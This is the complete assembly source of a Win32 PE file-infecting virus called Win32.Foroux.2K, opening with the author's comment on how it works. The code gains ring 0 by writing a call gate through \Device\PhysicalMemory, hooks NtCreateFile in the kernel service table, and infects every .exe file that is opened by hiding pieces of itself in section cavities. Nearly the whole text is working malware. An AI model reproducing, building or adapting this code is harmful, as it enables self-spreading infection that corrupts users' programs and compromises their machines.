comment $ Win32.Foroux.2K THIS is source code of a virus. This is a Win2K/XP ring 0 PE virus,by WQ. It took me only four days to code this virus.So there will be many bugs in it. First when it runs,it will try to switch to ring 0 from ring 3.The routine entering ring 0 is from some other's C code--I only rewrite it in asm. The routine that searches the API addresses in memory is copyed from Win32.Foroux.A(alias,Elkern.C,my another PE virus),it's a very good routine. The infection method is as same as all Elkern family--cavity infection.It will insert pieces of itself to the cavity of host file,but if there are no enough place for it,it will append to the tail of host file. After it entered ring 0,it will hook NtCreateFile by modifying KeServiceDescriptorTable.And any open file action will be intercepted.It only infect PE file with .exe extension. It can't work on Win2K with /3G switch because it only search ntoskrnl base address between 80400000h and 80500000h. $ .386p .model flat include includelib import32.lib extrn MessageBoxA: proc extrn ExitProcess: proc extrn CreateProcessA: proc DEBUG equ 1 if DEBUG include debug.asm endif SECTION_QUERY equ 0001h SECTION_MAP_WRITE equ 0002h SECTION_MAP_READ equ 0004h SECTION_MAP_EXECUTE equ 0008h SECTION_EXTEND_SIZE equ 0010h FILE_MAP_COPY equ SECTION_QUERY FILE_MAP_WRITE equ SECTION_MAP_WRITE FILE_MAP_READ equ SECTION_MAP_READ HASH16FACTOR = 0ED388320h HASH16 MACRO String,sym HASH_Reg = 0FFFFFFFFh IRPC _x, Ctrl_Byte = ('&_x&' XOR (HASH_Reg AND 0FFh)) HASH_Reg = (HASH_Reg SHR 8) REPT 8 Ctrl_Byte = (Ctrl_Byte SHR 1) XOR (HASH16FACTOR * (Ctrl_Byte AND 1)) ENDM HASH_Reg = (HASH_Reg XOR Ctrl_Byte) ENDM sym DW (HASH_Reg AND 0FFFFh) ENDM UNICODE_STR macro str irpc _c, db '&_c' db 0 endm endm BUFSIZE = 8192 INF_SIGN equ 'QW' INF_MIN_BLK_SIZE equ 38h MAX_BLK_NUM equ 100 MEM_INF_POS equ 1ch POSPARAM equ 0e08h or ((PosInfo-NewNCF_IP) shl 16) BASPARAM equ 0424h or ((BasInfo-NewNCF_IP) shl 16) STDPARAM equ 051ch or ((StdInfo-NewNCF_IP) shl 16) .data cap db 'Haha',0 .code vir_header: dd 0 dw VirSize dw 'QW' _start: call _start_ip_0 _start_ip_0: _start_ip equ k32_hash_table pop ebp add ebp,k32_hash_table-_start_ip_0 mov ebx,[esp] cmp ebx,80000000h ja goto_host lea edi,[ebp+k32_hash_table-8-_start_ip] and ebx,0ffe00000h ;98-BFF70000,2K-77E80000,XP-77E60000 call search_api_addr call _start_1 db 'ntdll',0 _start_1: call [ebp+addrLoadLibraryA-_start_ip] or eax,eax jz goto_host mov ebx,eax lea edi,[ebp+ntdll_hash_table-8-_start_ip] call search_api_addr call _start_2 db 'advapi32',0 _start_2: call [ebp+addrLoadLibraryA-_start_ip] or eax,eax jz goto_host mov ebx,eax lea edi,[ebp+advapi_hash_table-8-_start_ip] call search_api_addr push large 4 ;PAGE_READWRITE push large 1000h ;MEM_COMMIT push large VirSize*2 push large 0 call [ebp+addrVirtualAlloc-_start_ip] or eax,eax jz goto_host mov [ebp+vir_mem-_start_ip],eax merge_code_ip equ _start_ip cld lea esi,[ebp+_start-merge_code_ip] mov edi,eax ; lea edx,[ebp+_start_ip-merge_code_ip] mov edx,ebp sub edx,[ebp+host_section_rva-merge_code_ip] sub esi,edx merge_code_loop: add esi,edx movzx ecx,word ptr [esi-4] push esi rep movsb pop esi mov esi,[esi-8] or esi,esi jnz short merge_code_loop merge_code_end: lea edx,[ebp+objnamestr-_start_ip] mov [ebp+objnameptr-_start_ip],edx lea edi,[ebp+ObjAttr-_start_ip] and di,0fffch ;align to 4 bytes,or ZwOpenSection will fail push edi push large 24 pop ecx push ecx xor eax,eax rep stosb pop ecx pop edi mov esi,edi stosd mov [esi],ecx stosd lea eax,[edx-8] stosd mov dword ptr [edi],240h push esi push large 6 ;SECTION_MAP_READ|SECTION_MAP_WRITE lea edi,[ebp+hSection-_start_ip] push edi call [ebp+addrZwOpenSection-_start_ip] or eax,eax ;STATUS_SUCCESS? jz OpenSectionOK ;Yes push esi push large 00060000h ;READ_CONTROL|WRITE_DAC push edi call [ebp+addrZwOpenSection-_start_ip] push esi xor eax,eax push eax mov ebx,esp push eax mov esi,esp push ebx push eax push esi push eax push eax push large 4 ;DACL_SECURITY_INFORMATION push large 6 ;SE_KERNEL_OBJECT push dword ptr [edi] call [ebp+addrGetSecurityInfo-_start_ip] ;eAccess db ;02h,00h,00h,00h, 01h,00h,00h,00h, ;00h,00h,00h,00h, 00h,00h,00h,00h, ;00h,00h,00h,00h, 01h,00h,00h,00h, ;01h,00h,00h,00h, 50h,90h,41h,00h push large 32 pop ecx lea edi,[ebp+eAccess-_start_ip] push edi xor al,al rep stosb pop edi inc al mov byte ptr [edi],2 mov [edi+4],al mov [edi+20],al mov [edi+24],al call _start_3 db 'CURRENT_USER',0 _start_3: pop dword ptr [edi+28] push ecx push esp push dword ptr [esi] push edi push large 1 call [ebp+addrSetEntriesInAclA-_start_ip] xor eax,eax mov ebx,[esp] push eax push ebx push eax push eax push large 4 ;DACL_SECURITY_INFORMATION push large 6 ;SE_KERNEL_OBJECT mov edi,[ebp+hSection-_start_ip] push edi call [ebp+addrSetSecurityInfo-_start_ip] push edi call [ebp+addrZwClose-_start_ip] add esp,12 push large 6 ;SECTION_MAP_READ|SECTION_MAP_WRITE lea edi,[ebp+hSection-_start_ip] push edi call [ebp+addrZwOpenSection-_start_ip] or eax,eax ;STATUS_SUCCESS? jnz goto_host ;No OpenSectionOK: lea edi,[ebp+gGdt-_start_ip] sgdt [edi] inc dword ptr [edi] movzx esi,word ptr [edi] mov ebx,esi mov eax,[edi+2] cmp eax,80000000h jc ring0_end1 cmp eax,0a0000000h ja ring0_end1 and eax,1ffff000h push esi push eax push large 0 push large FILE_MAP_READ or FILE_MAP_WRITE push dword ptr [ebp+hSection-_start_ip] call [ebp+addrMapViewOfFile-_start_ip] or eax,eax jz ring0_end1 mov ecx,esi shr ecx,3 dec ecx dec ebx and bl,0f8h lea edi,[eax+ebx] FindGdtLoop: sub edi,8 test byte ptr [edi+5],0fh loopnz FindGdtLoop jnz ring0_end1 add edi,8 lea ecx,[ebp+Ring0Entry-_start_ip] lea esi,[ebp+CallGate-_start_ip] mov word ptr [esi],cx shr ecx,10h mov word ptr [esi+6],cx push edi push large 2 pop ecx rep movsd pop edi mov ecx,edi sub ecx,eax or cl,3 lea ebx,[ebp+calladdr-_start_ip] mov [ebx+4],cx push large VirSize push ebp ;->_start call [ebp+addrVirtualLock-_start_ip] or eax,eax jz ring0_end1 push large VirSize push dword ptr [ebp+vir_mem-_start_ip] call [ebp+addrVirtualLock-_start_ip] or eax,eax jz ring0_end1 call [ebp+addrGetCurrentThread-_start_ip] mov esi,eax push large 15 ;THREAD_PRIORITY_TIME_CRITICAL push eax call [ebp+addrSetThreadPriority-_start_ip] push large 0 call [ebp+addrSleep-_start_ip] call fword ptr [ebx] push large 0 ;THREAD_PRIORITY_NORMAL push esi call [ebp+addrSetThreadPriority-_start_ip] xor eax,eax stosd stosd push large VirSize push dword ptr [ebp+vir_mem-_start_ip] call [ebp+addrVirtualUnlock-_start_ip] push large VirSize push ebp ;->_start call [ebp+addrVirtualUnlock-_start_ip] ring0_end1: push dword ptr [ebp+hSection-_start_ip] call [ebp+addrZwClose-_start_ip] goto_host: sub ebp,1000h+_start_ip-vir_header host_section_rva equ dword ptr $-4 add ebp,offset host-400000h host_entry_rva equ dword ptr $-4 push ebp retn init_data: align 4 objname dw objnamestr_size,objnamestr_size+2 objnameptr dd 0 objnamestr equ this byte UNICODE_STR <\Device\PhysicalMemory> objnamestr_size equ $-objnamestr CallGate db 00h,00h,08h,00h,00,0ECh,00h,00h gGdt equ $ db 3 dup (0) ObjAttr db 24 dup (0) ; hSection dd 0 ; gGdt dw 3 dup (0) ; calladdr dw 3 dup (038h) ; eAccess db 32 dup (0) db 'KERNEL32' k32_hash_table equ this word HASH16 ,hsLoadLibraryA HASH16 ,hsMapViewOfFile HASH16 ,hsGetCurrentThread HASH16 ,hsSetThreadPriority HASH16 ,hsSleep HASH16 ,hsVirtualLock HASH16 ,hsVirtualAlloc HASH16 ,hsVirtualUnlock if DEBUG HASH16 ,hsOutputDebugStringA HASH16 ,hsGetLastError HASH16 ,hsExitProcess endif dw 0 k32_hash_addr equ this dword hHandle equ $ hSection equ $ calladdr equ $-4 addrLoadLibraryA dd 0 addrMapViewOfFile dd 0 addrGetCurrentThread dd 0 addrSetThreadPriority dd 0 addrSleep dd 0 addrVirtualLock dd 0 addrVirtualAlloc dd 0 addrVirtualUnlock dd 0 if DEBUG addrOutputDebugStringA dd 0 addrGetLastError dd 0 addrExitProcess dd 0 endif db 'ntdll.dl' ntdll_hash_table equ this word HASH16 ,hsZwOpenSection HASH16 ,hsZwClose dw 0 ntdll_hash_addr equ this dword addrZwOpenSection dd 0 addrZwClose dd 0 db 'ADVAPI32' advapi_hash_table equ this word HASH16 ,hsGetSecurityInfo HASH16 ,hsSetSecurityInfo HASH16 ,hsSetEntriesInAclA dw 0 advapi_hash_addr equ this dword addrGetSecurityInfo dd 0 addrSetSecurityInfo dd 0 addrSetEntriesInAclA dd 0 Ring0Entry: pushad pushfd cli call ring0_ip ring0_ip: pop ebp lea edi,[ebp+ntos_hash_table-8-ring0_ip] xor edx,edx mov dword ptr [edi+ntos_hash_addr-(ntos_hash_table-8)],edx mov ebx,80400000h call search_api_addr cmp dword ptr [edi+ntos_hash_addr-(ntos_hash_table-8)],edx jz ring0_ret cld mov eax,[edi+addrZwCreateFile-(ntos_hash_table-8)] mov eax,[eax+1] mov edx,[edi+addrKeServiceDescriptorTable-(ntos_hash_table-8)] mov edx,[edx] mov edi,[edx+eax*4] mov ecx,[ebp+vir_mem-ring0_ip] mov [ecx+OldNtCreateFile-_start],edi mov byte ptr [ecx+IsBusy-_start],0 ;Check whether residented cmp dword ptr [edi+NewNtCreateFile_start-NewNtCreateFile],0e8fa9c60h jz ring0_ret ;have residented lea edi,[edx+eax*4] push large 'KCUF'; push large MemSize push large 0 ;NonPagedPool call [ebp+addrExAllocatePoolWithTag-ring0_ip] or eax,eax jz ring0_ret push edi mov esi,87654321h vir_mem equ $-4 push esi mov edi,esi lea esi,[ebp+_start-ring0_ip] mov ecx,vir_first_blk_size rep movsb pop esi mov edi,eax push large VirSize pop ecx rep movsb pop edi add eax,NewNtCreateFile-_start mov [edi],eax ring0_ret: popfd popad retf db 'ntoskrnl' ntos_hash_table equ this word HASH16 ,hsKeServiceDescriptorTable HASH16 ,hsZwCreateFile HASH16 ,hsZwReadFile HASH16 ,hsZwWriteFile HASH16 ,hsExAllocatePoolWithTag HASH16 ,hsZwSetInformationFile HASH16 ,hsZwQueryInformationFile HASH16 ,hsNtZwClose dw 0 ntos_hash_addr equ this dword eAccess equ $ addrKeServiceDescriptorTable dd 0 addrZwCreateFile dd 0 addrZwReadFile dd 0 addrZwWriteFile dd 0 addrExAllocatePoolWithTag dd 0 addrZwSetInformationFile dd 0 addrZwQueryInformationFile dd 0 addrNtZwClose dd 0 dd 0 ;in--ebx is the base to search,edi->the hash table,include dll name search_api_addr: pushad pushfd call search_api_addr_ip search_api_addr_ip: pop ebp push ebp lea eax,[ebp+search_api_addr_seh-search_api_addr_ip] push eax xor ecx,ecx push dword ptr fs:[ecx] mov fs:[ecx],esp sub ebx,10000h search_api_addr_@1: add ebx,10000h ;ntoskrnl can be rebased,and it's not certain whether can found it,so not to search too high address to avoid blue screen cmp ebx,80500000h ja short search_api_addr_seh_restore cmp word ptr [ebx],'ZM' jnz short search_api_addr_@1 mov eax,[ebx+3ch] add eax,ebx cmp word ptr [eax],'EP' jnz short search_api_addr_@1 mov eax,[eax+78h] add eax,ebx mov edx,[eax+3*4] add edx,ebx mov ecx,[edi] cmp dword ptr [edx],ecx jnz short search_api_addr_@1 mov ecx,[edi+4] cmp dword ptr [edx+4],ecx jnz short search_api_addr_@1 search_api_addr_seh_restore: xor ecx,ecx POP DWord Ptr FS:[ecx] ; restore except chain pop esi pop esi add edi,8 or ebx,ebx jz short search_api_addr_ret call find_all_exportfunc search_api_addr_ret: popfd popad retn search_api_addr_seh: call search_api_addr_seh_ip search_api_addr_seh_ip: pop eax lea eax,[eax-(search_api_addr_seh_ip-search_api_addr_@1)] seh_cont: PUSH eax MOV EAX,[ESP + 00Ch+4] ; context POP DWord Ptr [EAX + 0B8h] ; context.eip = @ExceptProc XOR EAX,EAX ; 0 = ExceptionContinueExecution RET search_api_addr_end: find_all_exportfunc: cld dec ecx push eax xor eax,eax repnz scasw not ecx dec ecx push ecx push edi rep stosd ;Clear all API address pop edi sub edi,4 pop ecx pop eax mov esi,[eax+8*4] add esi,ebx ;esi->name RVA array mov esi,[esi] add esi,ebx xor edx,edx push ecx find_exportfunc: push ecx find_exportfunc_1: cmp edx,[eax+6*4] pop ecx jz short find_exportfunc_ret push ecx inc edx push eax call calc_hash16 push edi std mov ecx,[esp+3*4] repnz scasw pop edi pop eax jnz short find_exportfunc_1 push edx dec edx push edi mov edi,[eax+9*4] add edi,ebx ;edi->ordinal array movzx edx,word ptr [edi+edx*2] mov edi,[eax+7*4] add edi,ebx ;edi->function RVA mov edx,[edi+edx*4] add edx,ebx pop edi mov [edi+ecx*4+4],edx pop edx pop ecx loop find_exportfunc find_exportfunc_ret: pop ecx retn find_exportfunc_end: calc_hash16: ;esi->string push edx push 0ffffffffh pop edx cld load_character: lodsb or al, al jz exit_calc_crc xor dl, al mov al, 8 crc_byte: shr edx, 1 jnc loop_crc_byte xor edx, HASH16FACTOR loop_crc_byte: dec al jnz crc_byte jmp load_character exit_calc_crc: xchg edx, eax ;now ax is the hash 16,esi->string after the NULL character after last string pop edx ret calc_hash16_end: vir_first_blk_size equ $-_start NTEBP equ 10*4 NewNtCreateFile: push large 12345678h OldNtCreateFile equ $-4 NewNtCreateFile_start: pushad pushfd cli call NewNCF_IP_0 NewNCF_IP_0: NewNCF_IP equ uninit_data pop ebp add ebp,NewNCF_IP-NewNCF_IP_0 mov al,0 IsBusy equ $-1 or al,al jnz NewNCF_ret inc byte ptr [ebp+IsBusy-NewNCF_IP] cld mov esi,[esp+NTEBP+4+2*4] ;POBJECT_ATTRIBUTES mov ebx,[esi+2*4] ;ObjectName,UNICODE_STRING movzx ecx,word ptr [ebx] mov edx,[ebx+4] ;->string or edx,edx jz NewNCF_ret_1 or ecx,ecx jz NewNCF_ret_1 mov eax,[edx+ecx-4] call eax_to_lowcase if DEBUG cmp eax,00650021h ;is '!e'? ; if debug,only infect .e!e else cmp eax,00650078h ;is 'xe'? endif jnz NewNCF_ret_1 mov eax,[edx+ecx-8] call eax_to_lowcase cmp eax,0065002eh ;is '.e'? jnz NewNCF_ret_1 ;Check whether the path include '\system32',avoid infect system file lea edi,[ebp+VirBuf-NewNCF_IP] mov esi,edx xor eax,eax push ecx push edi UniToAnsi_1: lodsw call eax_to_lowcase stosb loop UniToAnsi_1 pop esi pop ecx ChkSystemLoop: cmp dword [esi],'sys\' jnz ChkSystemLoopNext cmp dword [esi+4],'3met' jz NewNCF_ret_1 ChkSystemLoopNext: inc esi loop ChkSystemLoop xor eax,eax push eax push eax push large 60h ;FILE_SYNCHRONOUS_IO_NONALERT or FILE_NON_DIRECTORY_FILE push large 1 ;FILE_OPEN push eax push large 0a7h ;FileAttributes push eax lea ecx,[ebp+temp-NewNCF_IP] push ecx ;IoStatusBlock push dword ptr [esp+NTEBP+4+2*4+8*4] ;POBJECT_ATTRIBUTES mov esi,ecx push large 40100000h ;SYNCHRONIZE or GENERIC_WRITE lea edi,[ebp+hHandle-NewNCF_IP] push edi call [ebp+addrZwCreateFile-NewNCF_IP] or eax,eax jnz NewNCF_ret_1 ;Check file size mov eax,STDPARAM call GetFInfo cmp dword ptr [ecx+12],0 jnz NewNCF_ret_1 mov eax,[ecx+8] mov [ebp+FileLen-NewNCF_IP],eax cmp eax,2000h ;<8K? jc NewNCF_ret_1 xor eax,eax push eax push eax push large BUFSIZE lea ecx,[ebp+VirBuf-NewNCF_IP] push ecx push esi ;IoStatusBlock mov esi,ecx push eax push eax push eax push dword ptr [edi] call [ebp+addrZwReadFile-NewNCF_IP] or eax,eax jnz NewNCF_ret_2 mov eax,BASPARAM call GetFInfo push dword ptr [ecx+4*8] push large 80h ;FILE_ATTRIBUTE_NORMAL pop edx mov [ecx+4*8],edx call SetFInfo pop dword ptr [ecx+4*8] cmp word ptr [esi+MEM_INF_POS],INF_SIGN ;check infected jz NewNCF_1 ;Check PE header cmp word ptr [esi],'ZM' jnz NewNCF_1 mov eax,[esi+3ch] cmp eax,600h ja NewNCF_1 add eax,esi cmp word ptr [eax],'EP' jnz NewNCF_1 test byte ptr [eax+16h+1],20h ;Is a DLL? jnz NewNCF_1 mov bl,[eax+5ch] ;Subsystem and bl,0feh cmp bl,2 jnz NewNCF_1 ;Check whether the file is a SFX(RAR file) xor edi,edi call get_section_of_rva mov ecx,[edx+0ch] add ecx,[edx+8] mov esi,ecx shr ecx,3 add ecx,esi cmp ecx,38383838h FileLen equ $-4 jna NewNCF_1 mov dword ptr [ebp+blk_min_size-NewNCF_IP],vir_first_blk_size+8 mov dword ptr [ebp+remaind_size-NewNCF_IP],VirSize xor edx,edx mov [ebp+BlkNum-NewNCF_IP],dl cld push eax mov ecx,MAX_BLK_NUM*2 lea edi,[ebp+BlkBuf-NewNCF_IP] xor eax,eax rep stosd pop eax first_section: movzx edx,word ptr [eax+14h] lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize next_section: add edx,28h mov ecx,[edx] ;VirtualSize mov edi,[edx+8] ;SizeOfRawData cmp ecx,edi jna short file_op_1 xchg edi,ecx file_op_1: add ecx,[edx+0ch] mov edi,vir_first_blk_size+8+38h call is_final_section jz short inf_at_tail mov edi,[edx+28h+0ch] sub edi,ecx cmp edi,vir_first_blk_size+8 blk_min_size equ $-4 ;NOTE:Next section's PointerToRawData may be 0 or less than current PointerToRawData ;if so,don't use this section.So use jl instead of jc jl goto_next_section inf_at_tail: ;Some PE file's .BSS(uninitialized data) and .TLS section's PointerToRawData can be 0,it doesn't take ;disk space.If infect this kind of section,the file will be damaged.So must avoid it. cmp dword ptr [edx+0ch],0 ;this section's PointerToRawData==0? jz goto_next_section xchg edi,ecx xor ebx,ebx mov bl,0 BlkNum equ $-1 mov [ebp+ebx*8+BlkPtr-NewNCF_IP],edi ;where to write sub edi,[edx+0ch] add edi,[edx+4] add edi,8 mov [ebp+ebx*8+BlkBuf-NewNCF_IP],edi ;RVA to read sub ecx,8 cmp ecx,[ebp+remaind_size-NewNCF_IP] jl short file_op_8 mov ecx,[ebp+remaind_size-NewNCF_IP] file_op_8: sub [ebp+remaind_size-NewNCF_IP],ecx mov [ebp+ebx*8+4+BlkBuf-NewNCF_IP],ecx ;how much bytes to write mov bl,[ebp+BlkNum-NewNCF_IP] or bl,bl ;is first block? jnz file_op_2 ;No ; mov word ptr [ebp+ebx*8+2+BlkBuf-NewNCF_IP],INF_SIGN or dword ptr [edx+1ch],00000020h or 00000040h or 10000000h or 20000000h or 40000000h or 80000000h ; modify section's Characteristics mov ebx,[eax+28h] ;AddressOfEntryPoint mov [ebp+host_entry_rva-NewNCF_IP],ebx ;save host code entry mov [eax+28h],edi add edi,(_start_ip-_start) mov [ebp+host_section_rva-NewNCF_IP],edi ;save host code base file_op_2: mov dword ptr [ebp+blk_min_size-NewNCF_IP],INF_MIN_BLK_SIZE mov ebx,[edx] ;VirtualSize mov edi,[edx+8] ;SizeOfRawData xor esi,esi cmp ebx,edi jna short file_op_3 xchg edi,ebx inc esi file_op_3: add ebx,ecx add ebx,8 file_op_4: cmp ebx,edi ;is bigger one less than small one? jna short file_op_5 ;no add edi,[eax+3ch] ;FileAlignment jmp short file_op_4 file_op_5: or esi,esi jz short file_op_6 xchg edi,ebx file_op_6: mov [edx],ebx mov [edx+8],edi or dword ptr [edx+1ch],00000040h or 40000000h; modify section's Characteristics and dword ptr [edx+1ch],not 02020000 ;delete discardable Characteristics inc byte ptr [ebp+BlkNum-NewNCF_IP] goto_next_section: mov ecx,VirSize remaind_size equ $-4 jecxz file_op_ok call is_final_section jnz next_section jmp first_section file_op_ok: xor edi,edi call get_section_of_rva ;Round image size mov ecx,[edx] add ecx,[edx+4] mov ebx,[eax+50h] file_op_9: cmp ecx,ebx jbe short file_op_10 add ebx,[eax+38h] jmp short file_op_9 file_op_10: mov [eax+50h],ebx ;Round physical size mov ecx,[edx+8] add ecx,[edx+0ch] mov [ebp+PhySize-NewNCF_IP],ecx lea esi,[ebp+_start-NewNCF_IP] xor ebx,ebx xor edx,edx WriteBlkLoop: mov [ebp+TmpBuf-NewNCF_IP],ebx mov eax,[ebp+edx*8+8+BlkBuf-NewNCF_IP] mov [ebp+TmpBuf-NewNCF_IP],eax mov eax,[ebp+edx*8+4+BlkBuf-NewNCF_IP] mov [ebp+4+TmpBuf-NewNCF_IP],eax push esi push large 8 pop ecx mov eax,[ebp+edx*8+BlkPtr-NewNCF_IP] lea esi,[ebp+TmpBuf-NewNCF_IP] call WriteToFile pop esi add eax,8 mov ecx,[ebp+edx*8+4+BlkBuf-NewNCF_IP] call WriteToFile add esi,ecx inc edx movzx ecx,byte ptr [ebp+BlkNum-NewNCF_IP] cmp edx,ecx jc WriteBlkLoop lea esi,[ebp+VirBuf-NewNCF_IP] push esi mov word ptr [esi+MEM_INF_POS],INF_SIGN ;Set infected sign. xor eax,eax mov ecx,BUFSIZE call WriteToFile pop esi ;Englarge file if necessary mov eax,STDPARAM call GetFInfo mov edx,82345678h PhySize equ $-4 mov eax,edx sub edx,[ecx+8] jl EnglargeFile_1 cmp edx,BUFSIZE ja EnglargeFile_1 xchg edx,ecx call WriteToFile EnglargeFile_1: NewNCF_1: mov eax,BASPARAM call SetFInfo ;restore file time and attr NewNCF_ret_2: push dword ptr [ebp+hHandle-NewNCF_IP] call [ebp+addrNtZwClose-NewNCF_IP] NewNCF_ret_1: dec byte ptr [ebp+IsBusy-NewNCF_IP] NewNCF_ret: popfd popad retn ;in--edx->current section VirtualSize,eax->PE base,ebx->base address,ebp->file_op_ip ;out--ZF set is final,ZF cleared isn't final is_final_section: pushad mov ecx,edx xor edi,edi call get_section_of_rva cmp ecx,edx popad retn is_final_section_end: ;in--eax=offset,esi->buffer,ecx=size WriteToFile: pushad mov dword ptr [ebp+PosInfo-NewNCF_IP],eax mov dword ptr [ebp+4+PosInfo-NewNCF_IP],0 mov eax,POSPARAM push ecx call SetFInfo pop ecx xor eax,eax push eax push eax push ecx push esi lea ecx,[ebp+temp-NewNCF_IP] push ecx push eax push eax push eax push dword ptr [ebp+hHandle-NewNCF_IP] call [ebp+addrZwWriteFile-NewNCF_IP] popad retn ;Get the section of a RVA ;in--eax=PE base,edi=RVA to find ;out--edx->section header.VirtualSize,ecx=0 means not found ;if not found,edx=>last section header.VirtualSize get_section_of_rva: push ecx movzx edx,word ptr [eax+14h] lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize movzx ecx,word ptr [eax+6] inc ecx get_section_of_rva_1: dec ecx jecxz get_section_of_rva_2 add edx,28h ;->VirtualSize mov esi,[edx+4]; esi=VirtualAddress cmp edi,esi ;RVANewNCF_IP ;out--ecx->info buffer GetFInfo: GetFInfo_IP equ NewNCF_IP pushad movzx ebx,ah push ebx movzx ebx,al push ebx shr eax,16 add eax,ebp push eax mov [esp+3*4+6*4],eax lea ebx,[ebp+temp-GetFInfo_IP] push ebx push dword ptr [ebp+hHandle-GetFInfo_IP] call [ebp+addrZwQueryInformationFile-GetFInfo_IP] popad retn ;in--ah=infotype,al=len,high 16 bit=disp of info buffer and NewNCF_IP,ebp->NewNCF_IP ;out--ecx->info buffer SetFInfo: SetFInfo_IP equ NewNCF_IP pushad movzx ebx,ah push ebx movzx ebx,al push ebx shr eax,16 add eax,ebp push eax mov [esp+3*4+6*4],eax lea ebx,[ebp+temp-SetFInfo_IP] push ebx push dword ptr [ebp+hHandle-SetFInfo_IP] call [ebp+addrZwSetInformationFile-SetFInfo_IP] popad retn eax_to_lowcase: push ecx push large 4 pop ecx eax_to_lowcase_0: cmp al,'A' jc eax_to_lowcase_1 cmp al,'Z' ja eax_to_lowcase_1 add al,'a'-'A' eax_to_lowcase_1: ror eax,8 loop eax_to_lowcase_0 pop ecx retn VirSize equ $-_start uninit_data: align 4 temp db 32 dup (0) TmpBuf db 8 dup (0) PosInfo dd 0,0 BasInfo dd 0,0, 0,0, 0,0, 0,0, 0 ,0 StdInfo dd 0,0, 0,0, 0, 0, 0 align 4 FLen dd 0 BlkBuf dd 2*MAX_BLK_NUM dup (0) BlkPtr dd MAX_BLK_NUM dup (0) VirBuf db BUFSIZE dup (0) if DEBUG hexstr db 16 dup(0) endif MemSize equ $-_start host: push large 0 push offset cap if 0 call nxt if DEBUG db 'Game over',0 else db 'Released!!!',0 endif nxt: endif push offset cap push large 0 call MessageBoxA push large 0 call ExitProcess end _start